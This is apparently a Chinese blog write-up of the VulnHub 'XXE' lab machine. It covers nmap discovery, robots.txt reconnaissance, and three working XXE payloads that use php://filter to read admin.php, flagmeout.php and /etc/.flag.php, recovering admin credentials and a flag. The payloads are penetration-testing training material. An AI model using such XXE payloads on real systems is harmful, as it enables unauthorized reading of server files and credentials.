vulnhub之XXE靶机详解

本文介绍了如何在Vulnhub环境中安装和利用XXE靶机进行安全测试。通过nmap探测主机,发现开放的80端口,进一步分析web站点,利用XXE漏洞获取敏感信息,包括用户密码和flag文件内容,涉及了base64编码和解码以及PHP代码解析。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >


前言

拒绝水文,从我做起,如果如下教程有看不懂的,直接call小编哦


一、靶机安装

靶机下载地址:https: //download.vulnhub.com/xxe/XXE.zip

如上地址直接拿到浏览器上,就可以进行靶机下载,下载后的文件夹如下所示:

在这里插入图片描述

直接打开虚拟机:

在这里插入图片描述
在这里插入图片描述

最后使用虚拟机打开(打开的文件在新建虚拟机路劲下面)

二、信息收集阶段

1. 环境

  1. kali配置如下:
    • ip:192.168.93.131
  2. xxe靶机未知

2. 探测局域网主机

使用nmap进行主机探测,nmap 192.168.93.100-199(探测192.168.93.100到192.168.93.199之中的所有主机),探测结果如下:

在这里插入图片描述

由上图可以看出,主机1开放了80号端口,http协议端口开放,说明有web站点,访问192.168.93.132,结果如下所示:

在这里插入图片描述

3. 信息收集

对于一个以知道的站点,第一步肯定是扫描,扫描机器太多了,有御剑,AWVS,还可以使用burpsuit爬取网页结构等等,我直接说信息收集的结果:

发现robots.txt文件,地址http://192.168.93.132/robots.txt,具体结果如下:

在这里插入图片描述

三、解题

由上一步的信息收集我们可以知道,该网站有如下两个目录:
http://192.168.93.132/xxe/,http://192.168.93.132/xxe/admin.php,先进入http://192.168.93.132/xxe/,尝试登录并抓包:

在这里插入图片描述

POC如下所示:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=admin.php">
]>
<root><name>&admin;</name><password>admin</password></root>

进入重放模块,使用POC进行分析:

在这里插入图片描述

解码结果分析可得用户名和密码:administhebest、admin@123

在这里插入图片描述

进行登录http://192.168.93.132/xxe/admin.php,结果如下所示:
在这里插入图片描述
在这里插入图片描述

读取flagmeout.php文件的POC如下所示:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=./flagmeout.php">
]>
<root><name>&admin;</name><password>admin</password></root>

在这里插入图片描述

base64解码结果如下所示:

<?php
$flag = "<!-- the flag in (JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5) -->";
echo $flag;
?>

JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5进行base32解码后再进行base64解码后的结果为/etc/.flag.php,然后读取/etc/.flag.php中的类容,POC如下所示:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/.flag.php">
]>
<root><name>&admin;</name><password>admin</password></root>

在这里插入图片描述

其中类容解码结果如下所示,直接PHP运行得到结果

$_[]++;$_[]=$_._;$_____=$_[(++$__[])][(++$__[])+(++$__[])+(++$__[])];$_=$_[$_[+_]];$___=$__=$_[++$__[]];$____=$_=$_[+_];$_++;$_++;$_++;$_=$____.++$___.$___.++$_.$__.++$___;$__=$_;$_=$_____;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$___=+_;$___.=$__;$___=++$_^$___[+_];$À=+_;$Á=$Â=$Ã=$Ä=$Æ=$È=$É=$Ê=$Ë=++$Á[];$Â++;$Ã++;$Ã++;$Ä++;$Ä++;$Ä++;$Æ++;$Æ++;$Æ++;$Æ++;$È++;$È++;$È++;$È++;$È++;$É++;$É++;$É++;$É++;$É++;$É++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$__('$_="'.$___.$Á.$Â.$Ã.$___.$Á.$À.$Á.$___.$Á.$À.$È.$___.$Á.$À.$Ã.$___.$Á.$Â.$Ã.$___.$Á.$Â.$À.$___.$Á.$É.$Ã.$___.$Á.$É.$À.$___.$Á.$É.$À.$___.$Á.$Ä.$Æ.$___.$Á.$Ã.$É.$___.$Á.$Æ.$Á.$___.$Á.$È.$Ã.$___.$Á.$Ã.$É.$___.$Á.$È.$Ã.$___.$Á.$Æ.$É.$___.$Á.$Ã.$É.$___.$Á.$Ä.$Æ.$___.$Á.$Ä.$Á.$___.$Á.$È.$Ã.$___.$Á.$É.$Á.$___.$Á.$É.$Æ.'"');$__($_);

相关网站

base32解码
MD5解码

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

三年之约-第二年

你的鼓励是对我最大的鼓励

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值